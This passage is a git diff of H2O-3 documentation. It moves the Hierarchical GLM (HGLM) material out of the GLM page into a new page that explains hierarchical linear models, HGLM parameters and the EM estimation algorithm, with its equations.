Algorithm-specific parameters - `upload_custom_metric `__: Upload a custom metric into a running H2O cluster. -HGLM parameters -''''''''''''''' - -- `HGLM `__: If enabled, then an HGLM model will be built. If disabled (default), then a GLM model will be built. - -- **rand_link**: The link function for random component in HGLM specified as an array. Available options include ``identity`` and ``family_default``. - -- `random_columns `__: An array of random column indices to be used for ``HGLM``. - -- **startval**: The initial starting values for fixed and randomized coefficients in ``HGLM`` specified as a double array. - - Shared GLM family parameters '''''''''''''''''''''''''''' @@ -101,7 +89,12 @@ Shared GLM family parameters :scale: 5% :align: middle -**GLM Family**: |GAM| `Generalized Additive Models `__ (GAM) |MS| `ModelSelection `__ |ANOVA| `ANOVA GLM `__ +.. |HGLM| image:: ../images/HGLM.png + :alt: HGLM + :scale: 5% + :align: middle + +**GLM Family**: |GAM| `Generalized Additive Models `__ (GAM) |MS| `ModelSelection `__ |ANOVA| `ANOVA GLM `__ |HGLM| `Hierarchical Generalized Linear Model `__ (HGLM) - `alpha `__: |GAM| |MS| |ANOVA| Specify the regularization distribution between L1 and L2. A value of ``1`` produces LASSO regression; a value of ``0`` produces Ridge regression. The default value of ``alpha`` is ``0`` when ``SOLVER = 'L-BFGS'``; otherwise it is ``0.5`` to specify a mixing between LASSO and Ridge regression. @@ -115,7 +108,7 @@ Shared GLM family parameters - `compute_p_values `__: |GAM| |MS| |ANOVA| Request computation of p-values. P-values can be computed with or without regularization. Setting ``remove_collinear_columns`` is recommended. H2O will return an error if p-values are requested and there are collinear columns and ``remove_collinear_columns`` flag is not enabled. Note that this option is not available for ``family="multinomial"`` or ``family="ordinal"``; ``IRLSM`` solver requried. This option defaults to ``False`` (disabled). -- `family `__: |GAM| |MS| |ANOVA| Specify the model type. +- `family `__: |GAM| |MS| |ANOVA| |HGLM| Specify the model type. - If the family is ``gaussian``, the response must be numeric (**Real** or **Int**). - If the family is ``binomial``, the response must be categorical 2 levels/classes or binary (**Enum** or **Int**). @@ -175,7 +168,7 @@ Shared GLM family parameters - `objective_epsilon `__: |GAM| If the objective value is less than this threshold, then the model is converged. If ``lambda_search=True``, then this value defaults to ``.0001``. If ``lambda_search=False`` and ``lambda`` is equal to zero, then this value defaults to ``.000001``. For any other value of ``lambda``, the default value of ``objective_epsilon`` is set to ``.0001``. The default value is ``-1``. -- `plug_values `__: |GAM| |MS| |ANOVA| (Applicable only if ``missing_values_handling="PlugValues"``) Specify a single row frame containing values that will be used to impute missing values of the training/validation frame. +- `plug_values `__: |GAM| |MS| |ANOVA| |HGLM| (Applicable only if ``missing_values_handling="PlugValues"``) Specify a single row frame containing values that will be used to impute missing values of the training/validation frame. - `prior `__: |GAM| |MS| |ANOVA| Specify prior probability for :math:`p(y==1)`. Use this parameter for logistic regression if the data has been sampled and the mean of response does not reflect reality. This value defaults to ``-1`` and must be a value in the range (0,1). @@ -183,7 +176,7 @@ Shared GLM family parameters - `remove_collinear_columns `__: |GAM| |MS| Specify whether to automatically remove collinear columns during model-building. When enabled, collinear columns will be dropped from the model and will have 0 coefficient in the returned model. This option defaults to ``False`` (disabled). -- **score_iteration_interval**: |MS| Perform scoring for every ``score_iteration_interval`` iteration. This option defaults to ``-1``. +- **score_iteration_interval**: |MS| |HGLM| Perform scoring for every ``score_iteration_interval`` iteration. This option defaults to ``-1``. - `solver `__: |GAM| |MS| |ANOVA| Specify the solver to use. One of: @@ -954,247 +947,6 @@ While not converged: i. Theta :math:`\gets` Maximum Likelihood estimate using Newton’s method with learning rate estimated using Golden section search -Hierarchical GLM -~~~~~~~~~~~~~~~~ - -Introduced in 3.28.0.1, Hierarchical GLM (HGLM) fits generalized linear models with random effects, where the random effect can come from a conjugate exponential-family distribution (for example, Gaussian). HGLM allows you to specify both fixed and random effects, which allows fitting correlated to random effects as well as random regression models. HGLM can be used for linear mixed models and for generalized linear mixed models with random effects for a variety of links and a variety of distributions for both the outcomes and the random effects. - -**Note**: The initial release of HGLM supports only the Gaussian family and random family. - -Gaussian Family and Random Family in HGLM -''''''''''''''''''''''''''''''''''''''''' - -To build an HGLM, we need the hierarchical log-likelihood (h-likelihood) function. The h-likelihood function can be expressed as (equation 1): - -.. math:: - - h(\beta, \theta, u) = \log(f (y|u)) + \log (f(u)) - -for fixed effects :math:`\beta`, variance components :math:`\theta`, and random effects :math:`u`. - -A standard linar mixed model can be expressed as (equation 2): - -.. math:: - - y = X\beta + Zu + e - -where - - - :math:`e \text ~ N(0, I_n, \delta_e^2), u \text ~ N(0, I_k, \delta_u^2)` - - :math:`e, u` are independent, and :math:`u` represents the random effects - - :math:`n` is the number of i.i.d observations of :math:`y` with mean :math:`0` - - :math:`q` is the number of values :math:`Z` can take - -Then rewriting equation 2 as :math:`e = X\beta + Zu - y` and derive the h-likelihood as: - -.. figure:: ../images/h-likelihood.png - :align: center - -where :math:`C_1 = - \frac{n}{2} \log(2\pi), C_2 = - \frac{q}{2} \log(2\pi)` - -In principal, the HGLM model building involves the following main steps: - -1. Set the initial values to :math:`\delta_u^2, \delta_e^2, u, \beta` -2. Estimate the fixed (:math:`\beta`) and random effects (:math:`u`) by solving for :math:`\frac{\partial h}{\partial \beta} = 0, \frac{\partial h}{\partial u} = 0` -3. Estimate variance components using the adjusted profile likelihood: - - .. math:: - - h_p = \big(h + \frac{1}{2} log \big| 2 \pi D^{-1}\big| \big)_{\beta=\hat \beta, u=\hat u} - - and solving for - - .. math:: - - \frac{\partial h_p}{\partial \theta} = 0 - - Note that :math:`D` is the matrix of the second derivatives of :math:`h` around :math:`\beta = \hat \beta, u = \hat u, \theta = (\delta_u^2, \delta_e^2)`. - -H2O Implementation -'''''''''''''''''' - -In reality, Lee and Nelder (see References) showed that linear mixed models can be fitted using a hierarchy of GLM by using an augmented linear model. The linear mixed model will be written as: - -.. math:: - - y = X\beta + Zu + e \\ - v = ZZ^T\sigma_u^2 + R\sigma_e^2 - -where :math:`R` is a diagonal matrix with elements given by the estimated dispersion model. The dispersion model refers to the variance part of the fixed effect model with error :math:`e`. There are cases where the dispersion model is modeled itself as :math:`exp(x_d, \beta_d)`. However, in our current version, the variance is just a constant :math:`\sigma_e^2`, and hence :math:`R` is just a scalar value. It is initialized to be the identity matrix. The model can be written as an augmented weighted linear model: - -.. math:: - - y_a = T_a \delta + e_a - -where - -.. figure:: ../images/hglm_augmentation.png - :align: center - -Note that :math:`q` is the number of columns in :math:`Z, 0_q` is a vector of :math:`q` zeroes, :math:`I_q` is the :math:`qxq` identity matrix. The variance-covariance matrix of the augmented residual matrix is - -.. figure:: ../images/hglm_variance_covariance.png - :align: center - -Fixed and Random Coefficients Estimation -'''''''''''''''''''''''''''''''''''''''' - -The estimates for :math:`\delta` from weighted least squares are given by solving - -.. math:: - - T_a^T W^{-1} T_a \delta=T_a^T W^{-1} y_a - -where - -.. math:: - - W= V(e_a ) - -The two variance components are estimated iteratively by applying a gamma GLM to the residuals :math:`e_i^2,u_i^2`. Because we are not using a dispersion model, there is only an intercept terms in the linear predictors. The leverages :math:`h_i` for these models are calculated from the diagonal elements of the hat matrix: - -.. math:: - - H_a=T_a (T_a^T W^{-1} T_a )^{-1} T_a^T W^{-1} - -Estimation of Fixed Effect Dispersion Parameter/Variance -'''''''''''''''''''''''''''''''''''''''''''''''''''''''' - -A gamma GLM is used to fit the dispersion part of the model with response -:math:`y_{d,i}=(e_i^2)⁄(1-h_i )` where :math:`E(y_d )=u_d` and :math:`u_d≡\phi` (i.e., :math:`\delta_e^2` for a Gaussian response). The GLM model for the dispersion parameter is then specified by the link function :math:`g_d (.)` and the linear predictor :math:`X_d \beta_d` with prior weights for :math:`(1-h_i )⁄2` for :math:`g_d (u_d )=X_d \beta_d`. Because we are not using a dispersion model, :math:`X_d \beta_d` will only contain the intercept term. - -Estimation of Random Effect Dispersion Parameter/Variance -''''''''''''''''''''''''''''''''''''''''''''''''''''''''' - -Similarly, a gamma GLM is fitted to the dispersion term :math:`alpha` (i.e., :math:`\delta_e^2` for a GLM) for the random effect :math:`v`, with :math:`y_\alpha,j = u_j^2⁄(1-h_{n+j}), j=1,2,…,q` and :math:`g_\alpha (u_\alpha )=\lambda`, where the prior weights are :math:`(1-h_{n+j} )⁄2`, and the estimated dispersion term for the random effect is given by :math:`\hat \alpha = g_α^{-1}(\hat \lambda)`. - -Fitting Algorithm Overview -'''''''''''''''''''''''''' - -The following fitting algorithm from "Generalized linear models with random effects" (Y. Lee, J. A. Nelder and Y. Pawitan; see References) is used to build our HGLM. Let :math:`n` be the number of observations and :math:`k` be the number of levels in the random effect. The algorithm that was implemented here at H2O will perform the following: - -1. Initialize starting values either from user by setting parameter startval or by the system if startval is left unspecified. -2. Construct an augmented model with response :math:`y_{aug}= {y \choose {E(u)}}`. -3. Use a GLM to estimate :math:`\delta={\beta \choose u}` given the dispersion :math:`\phi` and :math:`\lambda`. Save the deviance components and leverages from the fitted model. -4. Use a gamma GLM to estimate the dispersion parameter for :math:`\phi` (i.e. :math:`\delta_e^2` for a Gaussian response). -5. Use a similar GLM as in step 4 to estimate :math:`\lambda` from the last :math:`k` deviance components and leverages obtained from the GLM in step 3. -6. Iterate between steps 3-5 until convergence. Note that the convergence measure here is either a timeout event or the following condition has been met: :math:`\frac {\Sigma_i{(\text{eta}. i - \text{eta}.o)^2}} {\Sigma_i(\text{eta}.i)^2 \text{<} 1e - 6}`. - -A timeout event can be defined as the following: - -1. Maximum number of iterations have been reached -2. Model building run time exceeds what is specified in ``max_runtime_secs`` -3. A user has clicked on stop model button or similar from Flow. - -For families and random families other than Gaussian, link functions are used to translate from the linear space to the model the mean output. - -Linear Mixed Model with Correlated Random Effect -'''''''''''''''''''''''''''''''''''''''''''''''' - -Let :math:`A` be a matrix with known elements that describe the correlation among the random effects. The model is now given by: - -.. figure:: ../images/hglm_linear_mixed_model1.png - :align: center - -where :math:`N` is normal distribution and :math:`MVN` is multi-variable normal. This can be easily translated to: - -.. figure:: ../images/hglm_linear_mixed_model2.png - :align: center - -where :math:`Z^* = ZL` and :math:`L` is the Cholesky factorization of :math:`A`. Hence, if you have correlated random effects, you can first perform the transformation to your data before using our HGLM implementation here. - -HGLM Model Metrics -'''''''''''''''''' - -H2O provides the following model metrics at the end of each HGLM experiment: - -- fixef: fixed effects coefficients -- ranef: random effects coefficients -- randc: vector of random column indices -- varfix: dispersion parameter of the mean model -- varranef: dispersion parameter of the random effects -- converge: true if algorithm has converge, otherwise false -- sefe: standard errors of fixed effects -- sere: standard errors of random effects -- dfrefe: deviance degrees of freedom for the mean part of model -- sumvc1: estimates and standard errors of linear predictor in the dispersion model -- summvc2: estimates and standard errors of the linear predictor for the dispersion parameter of the random effects -- likelihood: if ``calc_like`` is true, the following four values are returned: - - - hlik: log-h-likelihood; - - pvh: adjusted profile log-likelihood profiled over the random effects; - - pbvh: adjusted profile log-likelihood profiled over fixed and random effects; - - caic: conditional AIC. - -- bad: row index of the most influential observation. - -Mapping of Fitting Algorithm to the H2O-3 Implementation -'''''''''''''''''''''''''''''''''''''''''''''''''''''''' - -This mapping is done in four steps: - -1. Initialize starting values by the system. -2. Estimate :math:`\delta =` :math:`\beta \choose u`. -3. Estimate :math:`\delta_e^2(\text {tau})`. -4. Estimate :math:`\delta_u^2(\text {phi})`. - -**Step 1**: Initialize starting values by the system. - -Following the implementation from R, when a user fails to specify starting values for psi, :math:`\beta`, :math:`\mu`, :math:`\delta_e^2`, :math:`\delta_u^2`, we will do it for the users as follows: - - 1. A GLM model is built with just the fixed columns and response. - 2. Next init_sig_e(:math:`\delta_e^2`)/tau is set to 0.6*residual_deviance()/residual_degrees_of_freedom(). - 3. init_sig_u(:math:`\delta_u^2`) is set to 0.66*init_sig_e. - 4. For numerical stability, we restrict the magnitude to init_sig_e and init_sig_u to >= 0.1. - 5. Set phi = vector of length number of random columns of value init_sig_u/(number of random columns). - 6. Set :math:`\beta` to the GLM model coefficients, :math:`\mu` to be a zero vector. - 7. Set psi to be a zero vector. - -**Step 2**: Estimate :math:`\delta =` :math:`\beta \choose u`. - -Given the current values of :math:`\delta_e^2, \delta_u^2`, we will solve for :math:`\delta =` :math:`\beta \choose u`. Instead of solving :math:`\delta` from :math:`T_a^T W^{-1} T_a \delta=T_a^T W^{-1} y_a`, a different set of formulae are used. A loop is used to solve for the coefficients: - - 1. The following variables are generated: - - - :math:`v.i= g_r^{-1} (u_i)` where :math:`u_i` are the random coefficients of the random effects/columns and :math:`g_r^{-1}` can be considered as the inverse link function. - - :math:`tau` is a vector of length number of data containing init.sig.e; - - :math:`eta.i=X_i \beta+offset` and store the previous :math:`eta.i` as :math:`eta.o`. - - :math:`mu.i=g^{-1} (eta.i)`. - - dmu_deta is derivative of :math:`g^{-1} (eta.i)` with respect to :math:`eta.i`, which is 1 for identity link. - - :math:`z_i=eta.i-offset+(y_i-mu.i)/\text {dmu_deta}` - - :math:`zmi= \text{psi}` - - :math:`augZ =` :math:`zi \choose zmi`. - - du_dv is the derivative of :math:`g_r^{-1} (u_i)` with respect to :math:`v.i.` Again, for identity link, this is 1. - - The weight :math:`W =` :math:`wdata \choose wpsi` where :math:`wdata = \frac {d \text{mu_deta}^2}{\text {prior_weight*family}\$\text{variance}(mu.i)*tau}` and :math:`wpsi = \frac {d \text{u_dv}^2}{\text {prior_weight*family}\$\text{variance(psi)*phi}}` - - 2. Finally the following formula is used to solve for the parameters: :math:`augXZ \cdot \delta=augZW` where :math:`augXZ=T_a \cdot W` and :math:`augZW=augZ \cdot W`: - - - Use QR decomposition to augXZ and obtain: :math:`QR \delta = augZW`. - - Use backward solve to obtain the coefficients :math:`\delta` from :math:`R \delta = Q^T augZW`. - - Calculate :math:`hv=\text{rowsum}(Q)` of length n+number of expanded and store in returnFrame. - - Calculate :math:`dev =` :math:`prior weight*(y_i-mu.i)^2 \choose (psi -u_i )^2` of length n+number of expanded random columns and store in returnFrame. - - Calculate :math:`resid= \frac {(y-mu.i)} {\sqrt \frac {sum(dev)(1-hv)}{n-p}}` of length n and store in returnFrame. - - Go back to step 1 unless :math:`\Sigma_i(eta.i-eta.o)^2 / \Sigma_i(eta.i)^2<1e-6` or a timeout event has occurred. - -**Step 3**: Estimate :math:`\delta_e^2(\text {tau})` - -With the newly estimated fixed and random coefficients, we will estimate the dispersion parameter for the fixed effects/columns by building a gamma GLM: - - 1. Generate a training frame with constant predictor column of 1 to force glm model to generate only the intercept term: - - - Response column as :math:`dev/(1-hv)`. - - Weight column as :math:`(1-hv)/2`. - - Predictor column of ones. - - The length of the training frame is the number of data rows. - - 2. Build a gamma GLM with ``family=gamma`` and ``link=log``. - 3. Set :math:`tau = \text {exp (intercept value)}`. - 4. Assign estimation standard error and sigma from the GLM standard error calculation for coefficients. - -**Step 4**: Estimate :math:`\delta_u^2(\text {phi})`. - -Again, a gamma GLM model is used here. In addition, the error estimates are generated for each random column. Exactly the same steps are used here as in Step 3. The only difference is that we are looking at the :math:`dev,hv` corresponding to the expanded random columns/effects. - .. _regularization: Regularization diff --git a/h2o-docs/src/product/data-science/hglm.rst b/h2o-docs/src/product/data-science/hglm.rst new file mode 100644 index 000000000000..1a98e63ad3ca --- /dev/null +++ b/h2o-docs/src/product/data-science/hglm.rst @@ -0,0 +1,392 @@ +Hierarchical Generalized Linear Model (HGLM) +============================================ + +Introduction +------------ + +Hierarchical linear models (HLM) are used in situations where measurements are taken with clusters of data and there are effects of the cluster that can affect the coefficient values of GLM. + +For instance, if we measure the performance of students from multiple schools along with other predictors like family annual incomes, students' health, school type (public, private, religious, etc.), and etc., we would suspect that students from the same school will have similar performances than students from different schools. Therefore, we can denote a coefficient for predictor :math:`m \text{ as } \beta_{mj}` where :math:`j` denotes the school index in our example. :math:`\beta_{0j}` denotes the intercept associated with school :math:`j`. + +A level-1 HLM can be expressed as: + +.. math:: + + y_{ij} = \beta_{0j} + \sum_{m=1}^{p-1} x_{mij} \beta{mj} + \varepsilon_{ij} \quad \text{ equation 1} + +The level-2 model can be expressed as: + +.. math:: + + \beta_{0j} = \beta_{00} + u_{0j}, \beta_{mj} = \beta_{m0} + u_{mj} \quad \text{ equation 2} + +where: + +- :math:`j(=[1,2,...,J])` denotes the cluster (level-2 variable) the measurement is taken from (e.g. the school index); +- :math:`i(=1,2,...,n_j)` denotes the data index taken from within cluster :math:`j`; +- :math:`\beta_{00}` is the fixed intercept; +- :math:`\beta_{0j}` is the random intercept; +- :math:`\beta_{m0}` is the fixed coefficient for predictor :math:`m`; +- The dimension of fixed effect coefficients is :math:`p` which includes the intercept; +- :math:`u_{mj}` is the random coefficient for predictor :math:`m`. For predictors without a random coefficient, :math:`u_{mj} = 0`; +- The dimension of the random effect coefficients is :math:`q` which can include the intercept. Note that :math:`q \leq p`; +- :math:`\varepsilon_{ij} \sim N(0, \delta_e^2)`; +- :math:`u_{ij} \sim N(0, \delta_u^2)`: +- :math:`\varepsilon_{ij}, u_{mj}` are independent; +- :math:`u_{mj}, u_{m^{'}j}` are independent if :math:`m \neq m^{'}`. + +We need to solve the following parameters: :math:`\beta_{00}, \beta_{0j}, \beta_{m0}, u_{mj}, \delta_e^2, \delta_u^2`. + +Defining an HGLM model +---------------------- +Parameters are optional unless specified as *required*. + +Algorithm-specific parameters +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +- **em_epsilon**: (Only available for EM method) Converge if beta/ubeta/tmat/tauEVar changes less (using L-infinity norm) than EM epsilon (defaults to ``0.001``). + +- **gen_syn_data**: If enabled, it will generate synthetic HGLM data with the fixed coefficients specified in ``initial_fixed_effects`` and the random coefficients taken from ``initial_random_effects`` or the random effects are randomly generated. In particular, it will generate the folowing output: :math:`Y_j = A_{fj} \theta_f + A_{rj} \theta_{rj} + r_j`. The gaussian noise is generated with variance that's specified in ``tau_e_var_init``. If the random coefficients are to be randomly generated, they are generated with gaussian distribution with variance that's specified in ``tau_u_var_init``. + +- **group_column**: Specify the level-2 variable name which is categorical and used to generate the groups in HGLM (defaults to ``None``). + +- **initial_fixed_effects**: An array that contains the initial values of the fixed effects coefficient (defaults to ``None``). + +- **initial_random_effects**: An H2OFrame ID that contains the initial values of the random effects coefficient. The row names should be the random coefficient names (defaults to ``None``). + + .. note:: + + If you aren't sure what the random coefficient names are, then build the HGLM model with ``max_iterations=0`` and check out the model output field ``random_coefficient_names``. The number of rows of this frame should be the number of level 2 units. Check out the model output field ``group_column_names``. The number of rows should equal the length of the ``group_column_names``. + +- **initial_t_matrix**: An H2OFrame ID that contains the initial values of the T matrix. It should be a positive symmetric matrix (defaults to ``None``). + +- **method**: Obtains the fixed and random coefficients as well as the various variances (defaults to ``"em"``). + +- `random_columns `__: An array of random column names from which random effects coefficients will be generated in the model building process. + +- `rand_family `__: Specify the distribution of the random effects. Currently only ``rand_family="gaussisan"`` is supported. + +- **random_intercept**: If enabled, will generate a random intercept as part of the random effects coefficients (defaults to ``True``). + +- **tau_e_var_init**: Initial variance estimate of random noise (residual noise). If set, this should provide a value of > 0.0. If not set, this will be randomly set during the model building process (defaults to ``0.0``). + +- **tau_u_var_init**: Initial variance estimate of random effects. If set, should provide a value > 0.0. If not set, this will be randomly set during the model building process (defaults to ``0.0``). + +Common parameters +~~~~~~~~~~~~~~~~~ + +- `custom_metric_func `__: Specify a custom evaluation function. + +- `ignore_const_cols `__: Enable this option to ignore constant training columns, since no information can be gained from them. This option defaults to ``True`` (enabled). + +- `ignored_columns `__: (Python and Flow only) Specify the column or columns to be excluded from the model. In Flow, click the checkbox next to a column name to add it to the list of columns excluded from the model. To add all columns, click the **All** button. To remove a column from the list of ignored columns, click the X next to the column name. To remove all columns from the list of ignored columns, click the **None** button. To search for a specific column, type the column name in the **Search** field above the column list. To only show columns with a specific percentage of missing values, specify the percentage in the **Only show columns with more than 0% missing values** field. To change the selections for the hidden columns, use the **Select Visible** or **Deselect Visible** buttons. + +- `max_iterations `__: Specify the number of training iterations. This options defaults to ``-1``. + +- `max_runtime_secs `__: Maximum allowed runtime in seconds for model training. Use ``0`` (default) to disable. + +- `missing_values_handling `__: Specify how to handle missing values. One of: ``Skip``, ``MeanImputation`` (default), or ``PlugValues``. + +- `model_id `__: Specify a custom name for the model to use as a reference. By default, H2O automatically generates a destination key. + +- `offset_column `__: Specify a column to use as the offset; the value cannot be the same as the value for the ``weights_column``. + + .. note:: + + Offsets are per-row "bias values" that are used during model training. For Gaussian distributions, they can be seen as simple corrections to the response (``y``) column. Instead of learning to predict the response (y-row), the model learns to predict the (row) offset of the response column. For other distributions, the offset corrections are applied in the linearized space before applying the inverse link function to get the actual response values. + +- `score_each_iteration `__: Enable this option to score during each iteration of the model training. This option defaults to ``False`` (disabled). + +- `seed `__: Specify the random number generator (RNG) seed for algorithm components dependent on randomization. The seed is consistent for each H2O instance so that you can create models with the same starting conditions in alternative configurations. This option defaults to ``-1`` (time-based random number). + +- `training_frame `__: *Required* Specify the dataset used to build the model. **NOTE**: In Flow, if you click the **Build a model** button from the ``Parse`` cell, the training frame is entered automatically. + +- `validation_frame `__: Specify the dataset used to evaluate the accuracy of the model. + +- `weights_column `__: Specify a column to use for the observation weights, which are used for bias correction. The specified ``weights_column`` must be included in the specified ``training_frame``. + + *Python only*: To use a weights column when passing an H2OFrame to ``x`` instead of a list of column names, the specified ``training_frame`` must contain the specified ``weights_column``. + + .. note:: + + Weights are per-row observation weights and do not increase the size of the data frame. This is typically the number of times a row is repeated, but non-integer values are supported as well. During training, rows with higher weights matter more due to the larger loss function pre-factor. + +- `x `__: Specify a vector containing the names or indices of the predictor variables to use when building the model. If ``x`` is missing, then all columns except ``y`` are used. + +- `y `__: *Required* Specify the column to use as the dependent variable. + + - For a regression model, this column must be numeric (**Real** or **Int**). + - For a classification model, this column must be categorical (**Enum** or **String**). If the family is ``Binomial``, the dataset cannot contain more than two levels. + + +Estimation of parameters using machine learning estimation via EM +----------------------------------------------------------------- + +The Expectation-Maximization (EM) algorithm addresses the problem of maximizing the likelihood by conceiving this as a problem with missing data. + +Model setup +~~~~~~~~~~~ + +Consider a combined model for each unit :math:`j`: + +.. math:: + + Y_j = A_{fj} \theta_f + A_{rj} \theta_{rj} + r_j, \theta_{rj} \sim N(0,T_j), r_j \sim N(0, \sigma^2I) \quad \text{ equation 6} + +where: + +- :math:`Y_j = \begin{bmatrix} x^T_{j1} \\ x^T_{j2} \\ x^T_{j3} \\ \vdots \\ x^T_{jn_j} \\\end{bmatrix}` is a known :math:`n_j \text{ by } p` matrix of level-1 predictors and :math:`x_{ji} = \begin{bmatrix} x^1_{ji} \\ x^2_{ji} \\ \vdots \\ x^{p-1}_{ji} \\ 1 \\\end{bmatrix}`; + + .. note:: + + In general, you can place the intercept at the beginning or the end of each row of data, but we chose to put it at the end for our implementation. + +- :math:`\theta_f \text{ is a } p` by 1 vector of fixed coefficients; +- :math:`A_{rj}` is usually denoted by :math:`Z_{rj} \text{ where } Z_{rj} = \begin{bmatrix} z^T_{j1} \\ z^T_{j2} \\ z^T_{j3} \\ \vdots \\ z^T_{jn_j} \\\end{bmatrix}`; + + .. note:: + + We included a term for the random intercept here. However, there are cases where we do not have a random intercept, and the last element of 1 will not be there for :math:`z_{ji}`. + +- :math:`\theta_{rj}` represents the random coefficient and is a :math:`q` by 1 vector; +- :math:`r_j \text{ is an } n_j` by 1 vector of level-1 residual noise assumed multivariate normal in distribution with 0 mean vector, covariance matrix :math:`\sigma^2 I_{n_{j}\times n_{j}} \text{ where } I_{n_{j \times nj}}` is the identity matrix, :math:`n_j \text{ by } n_j`; +- :math:`j` denotes the level-2 units where :math:`j = 1,2, \cdots , J`; +- :math:`T_j` is a symmetric positive definite matrix of size :math:`n_j \text{ by } n_j`. We assume that :math:`T_j` is the same for all :math:`j = 1,2, \cdots , J`, and it is kept to be symmetric positive definite throughout the whole model building process. + +M-step +~~~~~~ + +EM conceives of :math:`Y_j` as the observed data with :math:`\theta_{rj}` as the missing data. Therefore, the complete data are :math:`(Y_j, \theta_{rj}), j=1, \cdots, J \text{ while } \theta_f, \sigma^2, \text{ and } T_j` are the parameters that need to be estimated. If the complete data were observed, finding the ML estimates will be simple. To estimate :math:`\theta_f`, subtract :math:`A_{rj} \theta_{rj}` from both sides of *equation 6* yielding: + +.. math:: + + Y_j - A_{rj} \theta_{rj} = A_{fj} \theta_f + r_f \quad \text{ equation 7} + +Next, multiply *equation 7* with :math:`A^T_{fj}` and sum across the level-2 unit :math:`j`. Note that :math:`\sum^J_{j=1} A^T_{fj} r_j \sim 0`. Re-arrange the terms and you will get *equation 8*, which is also the ordinary least squares (OLS) estimate: + +.. math:: + + \hat{\theta_f} = \Big( \sum^J_{j=1} A^T_{fj} A_{fj} \Big)^{-1} \sum^J_{j=1} A^T_{fj} (Y_j - A_{rj} \theta_{rj}) \quad \text{ equation 8} + +Next, ML estimators for :math:`T_j` and :math:`\sigma^2` are straightforward: + +.. math:: + + \hat{T_j} = J^{-1} \sum^J_{j=1} \theta_{rj} \theta^T_{rj} \quad \text{ equation 9} + +.. math:: + + \hat{\sigma^2} = N^{-1} \sum^J_{j=1} \hat{r^T_j} \hat{r_j} = N^{-1} \sum^J_{j=1} \big( Y_j - A_{fj} \hat{\theta_f} - A_{rj} \theta_{rj} \big)^T \big( Y_j - A_{fj} \hat{\theta_{f}} - A_{rj} \theta_{rj} \big) \quad \text{ equation 10} + +where :math:`N = \sum^J_{j=1} n_j`. + +.. note:: + + This reasoning defines certain complete-data sufficent statistics (CDSS), that is, statistics that would be sufficient to estimate :math:`\theta_f, T, \text{ and } \sigma^2` if the complete data were observed. These are: + + .. math:: + + \sum^J_{j=1} A^T_{fj} A_{rj} \theta_{rj}, \sum^J_{j=1} \theta_{rj} \theta^T_{rj}, \sum^J_{j=1} Y^T_j A_{rj} \theta_{rj}, \sum^J_{j=1} \theta^T_{rj} A^T_{rj} A_{rj} \theta_{rj} \quad \text{ equation 11}. + +E-step +~~~~~~ + +While the CDSS are not observed, they can be estimated by their conditional expectations given the data :math:`Y` and parameter estimates from the previous iterations. `Dempster et al. [4] <#references>`__ showed that substituting the expected CDSS for the M-step formulas would produce new parameter estimates having a higher likelihood than the current estimates. + +To find :math:`E(CDSS | Y, \theta_f, T, \sigma^2)` requires deriving the conditional distribution of the missing data :math:`\theta_r`, given :math:`Y, \theta_f, T, \sigma^2`. From *equation 6*, the joint distribution of the complete data is: + +.. math:: + + \begin{pmatrix} Y_j \\ \theta_{rj} \\\end{pmatrix} \sim N \Bigg[ \begin{pmatrix} A_{fj} \theta_{f} \\ 0 \\\end{pmatrix} , \begin{pmatrix} A_{rj}T_jA^T_{rj} + \sigma^2 & A_{rj}T_j \\ T_j A^T_{rj} & T_j \\\end{pmatrix} \Bigg] \quad \text{ equation 12} + +From *equation 12*, we can obtain the conditional distribution of the missing data given the complete data as follows: + +.. math:: + + \theta_{rj} | Y, \theta_f, T_j, \sigma^2 \sim N (\theta^*_{rj}, \sigma^2 C_j^{-1}) \quad \text{ equation 13} + +with + +.. math:: + + \theta^*_{rj} = C^{-1}_j A^T_{rj} (Y_j - A_{fj} \theta_f) \quad \text{ equation 14} + + C_j = A^T_{rj} A_{rj} + \sigma^2 T^{-1}_j \quad \text{ equation 15} + +The complete EM algorithm +~~~~~~~~~~~~~~~~~~~~~~~~~ + +The complete EM algorithm is as follows: + +1. Initialization: randomly assign some small values to :math:`\theta_f, \sigma^2, T_j`; +2. Estimation: estimate the CDSS: + + .. math:: + + E \big( \sum^J_{j=1} A^T_{fj} \theta_{rj} \theta_{rj} | Y, \theta_f, T_j, \sigma^2 \big) = \sum^J_{j=1} A^T_{fj} A_{rj} \theta^*_{rj} \\ E \big( \sum^J_{j=1} \theta_{rj} \theta^T_{rj} | Y, \theta_f, T_j, \sigma^2 \big) = \sum^J_{j=1} \theta^*_{rj} \theta^{*T}_{rj} + \sigma^2 \sum^J_{j=1} C^{-1}_j & \quad \text{ equation 17} \\ E \big( \sum^J_{j=1} r^T_j r_j \big) = \sum^J_{j=1} r^{*T}_j r^*_j + \sigma^2 \sum^J_{j=1} tr(C^{-1}_j A^T_{rj} A_{rj}) + + where: :math:`r^*_j = Y_j - A_{fj} \theta_f - A_{fj} \theta^*_{rj}, \theta^*_{rj} = C^{-1}_j A^T_{rj} (Y_j - A_{fj} \theta_f), C_j = A^T_{rj} A_{rj} + \sigma^2 T^{-1} \text{ and } \theta_f, \sigma^2, T` are based on the previous iteration or from initialization; + +3. Substitution: substitute the estimated CDSS from *equation 17* into the M-step forumulas (*equations 8, 9,* and *10*); +4. Processing: feed the new estimates of :math:`\theta_f, \sigma^2, T_j` into step 2; +5. Cycling: continue steps 2, 3, and 4 until the following stopping condition is satisfied: + + - The largest change in the value of any of the parameters is sufficiently small. + +Log-likelihood for HGLM +~~~~~~~~~~~~~~~~~~~~~~~ + +The model for level-2 unit :math:`j` can be written as: + +.. math:: + + Y_j = A_{fj} \theta_f + d_j = X_j \theta_f + d_j, \quad d_j \sim N(0,V_j) + +where: + +- :math:`Y_j \text{ is an } n_j` by 1 outcome vector; +- :math:`A_{fj} / X_j = \begin{bmatrix} x^T_{j1} \\ x^T_{j2} \\ x^T_{j3} \\ \vdots \\ x^T_{jn_{j}} \\\end{bmatrix}` is a known :math:`n_j \text{ by } p` matrix of level-1 predictors and :math:`x_{ji} = \begin{bmatrix} x^1_{ji} \\ x^2_{ji} \\ \vdots \\ x^{p-1}_{ji} \\ 1 \\\end{bmatrix}`; +- :math:`\theta_f \text{ is a } p` by 1 vector of fixed effects; +- :math:`d_j = A_{rj} \theta_{rj} + r_j = Z_j \theta_{rj} + r_j , A_{rj} / Z_j \text{ is } n_j \text{ by } q`; +- :math:`\theta_{rj} \sim N(0,T), \theta_{rj} \text{ is } q` by 1, :math:`T \text{ is } q \text{ by } q`; +- :math:`r_j \sim N(0, \sigma^2 I_{n_j}), I_{n_j} 